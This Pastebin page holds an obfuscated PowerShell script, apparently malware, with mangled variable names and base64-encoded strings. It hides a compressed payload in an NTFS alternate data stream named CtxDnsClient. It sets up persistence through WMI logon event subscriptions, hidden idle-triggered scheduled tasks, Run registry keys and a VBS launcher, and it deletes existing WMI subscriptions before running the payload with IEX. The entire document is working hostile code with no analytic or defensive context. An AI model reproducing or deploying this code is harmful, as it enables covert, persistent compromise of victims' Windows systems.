Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function _____/\_/\/\__/=\/(${_/=\/\/=\__/=\/\__})
- { ${____/=\/\/=\__/=\} = New-Object System.IO.MemoryStream;
- ${/=\_/==\/==\__/\/} = New-Object System.IO.Compression.GZipStream(${____/=\/\/=\__/=\}, [System.IO.Compression.CompressionMode]::Compress);
- ${_/\/\/=\/=\/=\___} = New-Object System.IO.StreamWriter(${/=\_/==\/==\__/\/});
- ${_/\/\/=\/=\/=\___}.Write(${_/=\/\/=\__/=\/\__});
- ${_/\/\/=\/=\/=\___}.Close();
- ${___/=========\/\_} = ${____/=\/\/=\__/=\}.ToArray();
- return [System.Convert]::ToBase64String(${___/=========\/\_});
- }
- function _/==\/\/=\/\____/=(${_/=\/\/=\__/=\/\__})
- { ${_/\/\____/\_/==\/} = [System.Convert]::FromBase64String(${_/=\/\/=\__/=\/\__});
- ${____/=\/\/=\__/=\} = New-Object System.IO.MemoryStream;
- ${____/=\/\/=\__/=\}.Write(${_/\/\____/\_/==\/}, 0, ${_/\/\____/\_/==\/}.Length);
- $null = ${____/=\/\/=\__/=\}.Seek(0,0);
- ${/=\_/==\/==\__/\/} = New-Object System.IO.Compression.GZipStream(${____/=\/\/=\__/=\}, [System.IO.Compression.CompressionMode]::Decompress);
- ${/===\___/\/===\/\} = New-Object System.IO.StreamReader(${/=\_/==\/==\__/\/});
- ${__/=\/\/\_/=====\} = ${/===\___/\/===\/\}.readtoend();
- return ${__/=\/\/\_/=====\};
- }
- function _/=\/\_/\__/\/====
- { [CmdletBinding()] Param(
- [Switch]
- ${____/\/\/==\__/\/\},
- [Switch]
- ${___/\/==\__/\/\/==},
- [Parameter(Position = 0, Mandatory = $True)]
- [String]
- ${___/=\______/==\/=},
- [Parameter(Position = 1, Mandatory = $True)]
- [String]
- ${___/\/\/\__/\/===\},
- [Parameter(Position = 2, Mandatory = $True)]
- [String]
- ${____/\/=\_/\_/\_/\},
- [Parameter(Position = 3, Mandatory = $True)]
- [String]
- ${____/\/\_/=\/=\___},
- [Parameter(Position = 4, Mandatory = $False)]
- [String]${____/\_/==\_/==\__}
- )
- ${_/\_/\/\/\_/\/===} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SAA0AHMASQBBAEEAQQBBAEEAQQBBAEUAQQBNADEAYQBiAFcALwBiAE4AaABEACsANwBsAC8AQgBHAGMAWQBxAG8AYgBHAGoANQBtAFUAcgBHAG4AZwBZAGwAVwBaADIAZwBMAG0ARgBtAHcAUwBiADcAUQBTAEIATABEAEcASwBhAGwAdAB5AEoATABwAHkAbAB1AGEALwA3ADQANgBrAC8AQgBMAEwAMgBkAHEAUwAzAFkASQBnAGQAawBUAHgAdQBlAFAAZAB3ADcAdgBqAFMAKwAwAGgAOAA5AE4AbwB5AHQAOQBjAHcAOAA5AHUAOAAzAEwAMwBFAHYANQBjADQAOQA5AEgAMABpAFQAVgA2AGwARwBsAFYAcgB5AHgAMgB4AFQATgBsAC8AaQBKADcANABvADMAZgByAFYAcQAxAHUAQwBjAHoAWABuAGoASgBQAGEAVABJAEkAcgBEAHEAegBkAHYATAB1AEkASQB2AHIATgBHAGkALwBFAHoAbgBzAEkAegBhADMAQwBjAHgASgA5AFkAeQBxAEgAeAB0AHoAUwBaAHUARgA3AEcAZgBqAHAAUQBiAFMAOQA4ADYAcwBhADAAZABVAEIANwBJAFoAMwBoAFoANwAvAHIATwBwAFEAMgBtAHkAOQBzADIAOQA3ADUAZABuAGgARwBYAFkAQgAxAEsATwBzAGkAZgBJAGMATwBjADUAZAByAGgATwAvAGwAYgBrAFoAYgByAHcASABXAEMARAB6AEEAMwBkAE4AVwBqAHcANQBEAEkALwBCADkANgBvADcAUQBPAEgAMABLADgARwAxAEsAZwA1AHgAcQAwAHoAdwBFAE4ANwBaAHkAaABEAFQAaABWAG8AKwBpADMAYgBzADAAUQBMAGUAMgBPADkAUgBEACsATgBZAEYAMQBhAFcAOQBJAEcAVwBYACsAbQBiAHMAegBrAEoAdwBLADIAZwBkAFUAQwBQAHcAWAB1AGoAZQBvAFQASAA2AFoAbwB3AEQATQAvAFkATwAyAGUASwBaAG0AVgBJAEIAZABmAGMARgA1AHcAVQBwAEwANgBpAHYAawBaAFQAQwBFAEQANwAxAGMAaQBPAEcANgBYAFgAZABWADcAUQA5AGsAdgBCAG8ARwBBAHIALwB0ADAANQAxAHcAUQBlADUATwA2AGEAdABrAFEAbwBHADYAMQBQAEsAUABxAHIAYwB6AEcASwBmAFIAMABsAE0ASQBEAHgAZgBYAG8AdAA0ADMAUgBUAEIAKwBuAHIAWABxAGoAMQBjAGkAMwAvAFUARQA5AEgAKwB1AEUATgBxAGQATQBaAHYAMwA1ADAAMQBhAC8ARgBzAFAATABZAHIARAA2AFQAMgBVAEIAcgBuAG4AOABrAEMAUgB4AFYAbwBSAFIAbgB5AGEAVgBNAEsAawBPAG0AagBRAG4AaAA2AC8AMABDAGkARwAyAEkAcABTAGEAUQBlAE0AeQBLAGsAawBUAHAAOQA5ADUAYQBzAFAAbgBiAHMAQwBuAG4AWQBCAG0AYQBkAG4AdgB4AEoAcQBuAEUAMgBUAHAATABSAGIARQByAHEAZAB6AE8AVwAzAHYAUAA3AEsAVwB2AHkATwBTAGUAbAB3AHkAdgBBAHEAMgBUAHYAbAB4ADkAZgBFAFoAdAA4AEoAaABrAGIATQA1AC8AWABNADIARgBRAFUAcAA5ADYAbgBMAE0AMABKAGwAWAB3AGoAWAAvAHIAcABWAGYATwAzAEgASAAyADkAbQB6AEkAZQArAFMAeABRAHQAZwA0AFkAMwBwAFYAKwBtAHAAVgB0AHEAaABRACsAcgBpAGUAVABjAGMAUgB0AHoAYQBRADcASQBGAHoAQgBXAGoAUgBqAFYAWABlAGoAZAAyAEIAeQA1AFEAUABuAGkAcwBMAHkAagBnAHkAcwBJAEQARAA5AFEAOQBlAEgAQwBRAFQAVQB1ADkANAA4ADIAZwB5AG0ANABEAFgAUwAxADYAMQBHADMANAB5AGkANwBsADkASgBVAGMARwB2ADcANwBIAC8AZAB2AHYASwAxAFYAWQBRAEUAcQBSAE0AaQA2ADMAMgB2AFAAegArAHgAbQB2AHkAeQBtADQAWQByADIAbgBmAGYAOABqADYANgBXAE0AegA0AEEAMQBaAFMAbwBkAFYAUgA2AFgASQBZAEgARgB2AGwAVQBEAFcAaABaAHoAWABNAFMASABBAGwAUwBPAC8AUgAzAEwANgArACsASABIADQARwBVADUATwB3ACsANAAyAHoAUwBPAEgAMwBmADYATABCAEoAawB0ADcARAA2AEoAawAzAEUAVABOADkAOQAxAEkASwBVAHYAYgBaAHYAZAB6AGEAOQBUAGkAWgBUAEYATwBXAFoAUwBDACsAMABlAHAASABVAHcAbABpAGwAVQBuAGYASQBZAFAAeQBmAGkAdgBmAE8AeABBAG8ASQBTAG8AVwBUADIAdwBaAGQANABvAHAASgB1ADMANwB6AEUAQwBrADkARAAvAFMAQwBHAGEAWgBWAFQAYQBNAGIAWQBBAE4AMABVAGMAYQBiADkAcwByAHgAKwBNAGsAWQAxAGIAUgB2AEkAaQA5AEkAdgBRAHUAbgBQADUAMAAwAEkAMwB6AGgASwBhAHAAZAB5AC8ANgBLAFQAOABXAFoAbABoAG0AZwBmAE4AawBMAFEAZQBVADQAZAB0AHIAbgBnADcAWQB1AHEAZABsADgAQgBHAGQAawBFAGkAbwB6AGEAYQBVAGoAVgB5AHoASABPADYAMwBjAEcAVgB6AHoATQBxAFkASgBYAHIAdABFAEcAZQBuAFYATwBIAEcANwB5AHcATwArAGEAMwBRAFIAaQBTAE8ATABlAFkAOABZADIAeABrAE8AVAB1AE8ALwBiAC8AZwA2AFYAdgBtAHIAegBOAFYAawBtAFYAWABoAFIAVgBKAGkAMgBlAFkAKwBvAEYANQB3AGYATgBNAFgAYgBIAFMAWQBvAEIAbABjAGgAbwBBAEYALwBDAEUAeABjAEUAcQAwADgAbwBBADEAbgBnADAAVABzAEkASQBtAEoAUgB4AEwAKwBVAFEAbAByAHcAbwBCAHYAZgA0AGsAMABBAG0ATABQAHkAZQBUAEMAWQBRAHMAUgBaAHQARwBVACsAbQBpADAAYQBaAGUAWgBHAEQAaABjAFgATwBiADEARQBQAGEARwAxADAAWgBwAHoATgByAHcAcABWAG0AMAB0ADEAcwBaAGEAQQBnAGcARgBqADYARwBDAFkASgBPAE0AcgB3AFgAYQBoAHAARQBpAGcAMQA0AHEALwB0AFIAcwBQAE0AdgBPAEsAVwBWAGMAeABTAHMAMwA2AFIARABqAFEATwA1ADAAeABVAFAATwBiAFMANwBLAEwAMwBQADAAawBhAHQAVABRAC8AWQBpAEYANQBJAGYAUQBuAGQATAAyAEsAWgBaAG0ANQAvAGkAYwBVAFYAVwA3AGsAawBIAEsAYgBxADUASQAyAFkAagBzAEkAMABJAHEAbwBrAGoANgBvAGIAUQBaADcAYwBIAG0ARQBTADgAeQBsACsAawBGAGUAUwA5ADAAOQA3AEMASwBEAFUASQBqAFYAUwB6AEEANwA2AE4AcABEAEIAWABKAHMAQwBDAFAAYQBmAHQARQByAHYAZgAxAHIAaAA0AEEAZQBrAHAAYgBvAFYAdwBVAEcAbABnADkANQBHADUASwAyADcANQBhADkAMgBoAGQAagBQAGUAUQBwAHEAQgBwAHoANAB6AE4AWQBRAEYANABTAEYAcwBuAGEAcQAyAHYASABSADcAVwBtADcAZQA0AEkASgBTAHIATgBxADAAdQBsAGQAQQA1ADkAVQBJAFQAMABCAEUAYQB3AFkAegBXAE8AZQA1AE8ATQBQADEATQBBAFcAaQBZAC8ASQBuAGMATwBqAEQAZwB5AGkANAB1AFkAWAB1ADAATAA1AGkAQwBTADEAbAAzAGcAdAB0AG4AKwB1AEEAegBOAEUAagBQAGsAUABZAGgAYQBwAC8ATAA3AFQATAA5ADIAZwBmAEMATwBLACsAbABXAHcAMQBzAEgAMwBSAEIAVwA0AGoAcgBQAFUATgB4AFAAYwBmAE4AagB3AHUANQBFADYAcQBYADcAMwAyAGMAUwB1ADEAUQB1AGwAVQB2ADMALwB1AEMANwB4ADIAbAB0AFYANwBvAEwAcwBhAFcANwBuAEwAbgBXAGEAKwA5AEEAVgA3AFkAMgBWAEMAYQA3AHEAdgBrAEoAcABPAGQAVgBzAE0ARQBBAHIAcQBqADMASwBrADkAagB3AFkAaABiAG0AcgAzAFQATwAxACsAQgByAGkANQBDAGkAWABlADAATgBBAG0AWAA0AGgAVgBBAEQAVQB5AGoAVQBMAE0AUwBBAGwAbAArAGwAMABLADAASQBuAFkAKwBUAFQARQA5AFIAQgBqAFMANQBkADYAKwBoAE4AZQBQADgAZgB6AG8AZABkAEcAWQBvAHMANAB2AEIAbQBaAEsAQwA0AEEAKwBrAEMAVQBvAHMASQBnAFgAZAB5AEMAegAzAFYAdQB3AFkAZgB1AEgATgAwAG4AOAA2AGoAKwBSAEkAZABMAEEARwBDAEoAcgA3ADkARwBCACsAZwBEAEwAUAA4AEQALwBZAGMASABRAFkANwA1AHMAeQBNAEQAcgBuAGIAbwBPAGQAcQBaAG0AYgBHADMAcAA0AG8ANgBlAFoAcQBsAEgANwA2AEwAQQBUAGUAUgBoAFkAVgBlAHcAMwBpADQAbgBtADQANQBwAGwAWQBXAEEAUAA4AEoANABlAFUAMAAwAHAANABxAHYARgBEAE8AMABzAEQATQBnAHQASABMADMAYgA4AE0AdwBnAE0AcABCAFcAcwBDAC8AWgBHAFIAZABVAEYAegBLAE8AaQBZAEEAVwBpAHgARQAzAE8AZwBBAG8AQgB1ADYARAB1AHgAegBOAFgAUABjADQARABtAG0ARAA4AE4ARgBSAFYATQA4AEwAeAByAHkATgA2AHYAeABKAEcAcQAvAG8AQQBMAC8ATgA3AEgATQBOAFgAWABuAHkAYgBBAHYAbwBtADQAbgBXAEMAbQBlAEIANQBTAFcAVgBRAHcAWQA3AGMAVAA5AGsAUQBKAHEAdAArAGQAUQAxAHkARAB0AG4AMABUACsAWABPAEkANgA4ADkAVwBaAHEATABTAEcAbwBxAHMAVAA0ADMAZABCAHMAbAB4AEoAWABlAGkAOQBsAHQATQB3AEkAOQB3ADgAdgB2ADYANAA4AG8AUQA5AHgAUQBoAEcAagBKAEQAUABGAGYANwBpAHIANgBCACsAMABOAGkAWgAzADEAawBJAHEANABNAHMAWABpAEcANgBlAE8AWABiAE8ATQBVAGgAMQA1AGYAYwBRAG4AaQBPADUAMwA2AEwAZwA0ADkAMQBLAGsASABDAEMAbAB1AFcAKwBTADMAMABaAGoASgB3ADQAMwBpAEwAbwBYAFEAcABEAGcAYQBoAGkANwA0AHEAbgBOAFUAKwBiAEkANwBHAFkAWAA2ADYAZwBoAHEAYwBkAEMAeQBlAGQARwBFAFYARgBkAFAAagBCAHIAUABHAEsAVwA2AGsAUABPAFoATABFAC8AWQAxACsANQBkAG0AQgBHADcASQBhADUATQBTAHIAUABzAFkAZQBNADgAagBTAGEAVwByAFMANABCAGwASwBpAEcAbAB3AEIAMABsAGQATQA1AHAAagAxADUAdABVAGYAWQBRAG8AeQB2AG4AbwAwAFoAbQA1AEoANgB4AHYAdwBrAEQAagBJAFEAdABrAGEAaABLAEIAWQBVADIAagA5ADAAbgBDAFcAaABEAGcAOABjADkAQwBLAEIASABqAHkASwBaADAAeQBNAFcAYgBoAC8ANgB4AEEAVwB4ADMAeABTADkAQgBkAHcAUgBYAG8ATgBiAFMANAB2AEoAQwBpAGUAYgB2AFgAYQAyAGkASABpAHYANgBJAEwAeQBBAEQAOQBGAFUAZgBNAGkAVgBOAGkANQBIAG0ANwBGAEsARAB3ADEARABuAHIAcABzAHgAMQBZAHEAbQBiAEkAcAB1ADkAMABWAFQAVgBLAHAAZwB2AEQAcwByAG4AcwBqAEIAeABTAGMAKwBsAGUAWQB0AGoANgBlAEkAbQBBAHEAcQBFAGwANQBIAEsAZQBsAFgASQB0AG8AaQB4ADUAZQAxAEYAagB5AGMAeQBLAHEAUQAwAG4AcgB4ADgAQwBRADIASwBsAG0AZgBQADAAdgBKAHcAaABaAFEALwBPAHoAWQBlAGUAagA3ACsAdwAxAHcANgA0ADgAbgAwAGIASQBXAEoAdwA1AFIANQBvADgAVwA5AEkAZgBnADkAeABxAHQARAAyAEEAVABmAGIANgBMAFkARwA0AC8ARgA4AFgARgBsAGMAVwBEADYAVwBQAGsAYgBMAGcASgBNADcAdQBRAHMAQQBBAEEAPQA=')));
- ${/=\____/=\/===\/=} = _/==\/\/=\/\____/=(${_/\_/\/\/\_/\/===});
- ${__/\/===\_/==\_/\} = $env:programdata+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABXAGkAbgBkAG8AdwBzAA==')))
- ${_/\/\__/=\_/\__/\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQALgBkAGwAbAA=')))
- ${/==\___/\/====\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQALgB2AGIAcwA=')))
- ${__/==\/=\_/\/\/\_} = "${__/\/===\_/==\_/\}`:${/==\___/\/====\_/}"
- if(${____/\/\/==\__/\/\} -eq $True)
- { ${/=\__/\/==\/==\__} = "logic ${___/=\______/==\/=} ${___/\/\/\__/\/===\} ${____/\/=\_/\_/\_/\} ${____/\/\_/=\/=\___} ${____/\_/==\_/==\__}"
- ${_/=\/\/\/\_/\/\/\} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
- if(${_/=\/\/\/\_/\/\/\}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
- { ${_/\/\___/==\/\/\/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgA=')))
- ${/=\_/\/\/=\____/=} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEwATQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuAFwA')))
- }
- else
- { ${_/\/\___/==\/\/\/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwA=')))
- ${/=\_/\/\/=\____/=} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuAFwA')))
- }
- ${/=\/=\/\__/\_/\/\} = [convert]::ToInt32($($PSVersionTable.PSVersion.Major|Out-String).Trim())
- if(${/=\/=\/\__/\_/\/\} -gt 2)
- { sc -Path ${__/\/===\_/==\_/\} -Value ${/=\____/=\/===\/=} -Stream ${_/\/\__/=\_/\__/\}
- ac -Path ${__/\/===\_/==\_/\} -Value ${/=\__/\/==\/==\__} -Stream ${_/\/\__/=\_/\__/\}
- }
- else
- { ${_/\/\_/=\/=\_/\_/} = ${/=\____/=\/===\/=} + "`n" + ${/=\__/\/==\/==\__}
- ${/==\_/\__/\/\_/==} = _____/\_/\/\__/=\/(${_/\/\_/=\/=\_/\_/})
- New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name CtxDnsClient -PropertyType String -Value ${/==\_/\__/\/\_/==} -force
- }
- ${_/=\/\/\/\_/\/\/\} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
- if(${_/=\/\/\/\_/\/\/\}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
- { ${_/=\/\_/=\____/==}=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQAXwBGAGkAbAB0AGUAcgA=')));
- ${/==\___/=\/=\/\_/}=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwB0AHgARABuAHMAQwBsAGkAZQBuAHQAXwBjAG8AbgBzAHUAbQBlAHIA')));
- gwmi __eventFilter -namespace root\subscription | Remove-WmiObject
- gwmi CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
- gwmi __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject
- ${_/\/\___/=\_/\/\/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class __EventFilter -Arguments @{Name = ${_/=\/\_/=\____/==}; EventNamespace = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAEMASQBNAFYAMgA='))); QueryLanguage = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBRAEwA'))); Query = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAF8AXwBJAG4AcwB0AGEAbgBjAGUAQwByAGUAYQB0AGkAbwBuAEUAdgBlAG4AdAAgAHcAaQB0AGgAaQBuACAAMwAwACAAdwBoAGUAcgBlACAAdABhAHIAZwBlAHQASQBuAHMAdABhAG4AYwBlACAAaQBzAGEAIAAnAFcAaQBuADMAMgBfAEwAbwBnAG8AbgBTAGUAcwBzAGkAbwBuACcA')))}
- ${/===\/=====\/\/\/} = ""
- if(${/=\/=\/\__/\_/\/\} -gt 2)
- { ${_/=\___/=\/=\/\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class CommandLineEventConsumer -Arguments @{Name = ${/==\___/=\/=\/\_/}; ExecutablePath = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA'))); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"IEX `$(Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|Out-String)`""}
- ${/===\/=====\/\/\/} = "IEX `$(Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|out-string)"
- ${/=\_____/\/\/=\__} = "IEX `$(gc -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\} ^|Out-String)`""
- ${___/=\/\/\__/\/\/} = [System.Text.Encoding]::Unicode.GetBytes(${/=\_____/\/\/=\__})
- ${/==\_/=\______/==} = [Convert]::ToBase64String(${___/=\/\/\__/\/\/})
- schtasks.exe /F /create /tn CtxDnsClient /tr "powershell.exe -WindowStyle Hidden -e ${/==\_/=\______/==}" /sc onidle /i 30
- }
- else
- { ${_/==\/\/\_/\/=\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).CtxDnsClient);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
- ${___/=========\/\_} = [System.Text.Encoding]::Unicode.GetBytes(${_/==\/\/\_/\/=\/=})
- New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name Part -PropertyType String -Value ${_/==\/\/\_/\/=\/=} -force
- ${/===\/=====\/\/\/} = "IEX `$((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).Part)"
- ${_/=\___/=\/=\/\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class CommandLineEventConsumer -Arguments @{Name = ${/==\___/=\/=\/\_/}; ExecutablePath = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUA'))); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/===\/=====\/\/\/}`""}
- schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/===\/=====\/\/\/}`"" /sc onidle /i 30
- }
- Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuAA=='))) -Class __FilterToConsumerBinding -Arguments @{Filter = ${_/\/\___/=\_/\/\/}; Consumer = ${_/=\___/=\/=\/\_/}} | out-null
- if(${___/\/==\__/\/\/==}){ IEX ${/===\/=====\/\/\/};
- }
- }
- else
- { if(${/=\/=\/\__/\_/\/\} -gt 2)
- { ${/===\/=====\/\/\/} = "IEX (Get-Content -Path ${__/\/===\_/==\_/\} -Stream ${_/\/\__/=\_/\__/\}|Out-String)"
- IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${__/==\/=\_/\/\/\_}`""
- IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/===\/=====\/\/\/}`"`",0 >> ${__/==\/=\_/\/\/\_}`""
- New-ItemProperty -Path ${/=\_/\/\/=\____/=} -Name CtxDnsClient -PropertyType String -Value "wscript ${__/==\/=\_/\/\/\_}" -force
- schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe ${__/==\/=\_/\/\/\_}" /sc onidle /i 30
- }
- else
- { ${_/==\/\/\_/\/=\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).CtxDnsClient);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
- ${___/=========\/\_} = [System.Text.Encoding]::Unicode.GetBytes(${_/==\/\/\_/\/=\/=})
- New-ItemProperty -Path ${_/\/\___/==\/\/\/} -Name Part -PropertyType String -Value ${_/==\/\/\_/\/=\/=} -force
- ${/===\/=====\/\/\/} = "IEX ((Get-ItemProperty -Path ${_/\/\___/==\/\/\/}).Part)"
- IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${__/==\/=\_/\/\/\_}`""
- IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/===\/=====\/\/\/}`"`",0 >> ${__/==\/=\_/\/\/\_}`""
- New-ItemProperty -Path ${/=\_/\/\/=\____/=} -Name CtxDnsClient -PropertyType String -Value "wscript ${__/==\/=\_/\/\/\_}" -force
- schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\System32\wscript.exe ${__/==\/=\_/\/\/\_}" /sc onidle /i 30
- }
- if(${___/\/==\__/\/\/==}){IEX "wscript ${__/==\/=\_/\/\/\_}";}
- }
- }
- else
- { ${/=\__/\/==\/==\__} = "logic ${___/=\______/==\/=} ${___/\/\/\__/\/===\} ${____/\/=\_/\_/\_/\} ${____/\/\_/=\/=\___} ${____/\_/==\_/==\__}"
- IEX "${/=\____/=\/===\/=} `n ${/=\__/\/==\/==\__}"
- }}
- _/=\/\_/\__/\/==== $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwB3AHcA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dwB3AHcA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQBhAGkAbAA='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AG8AcAA='))) -____/\/\/==\__/\/\
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement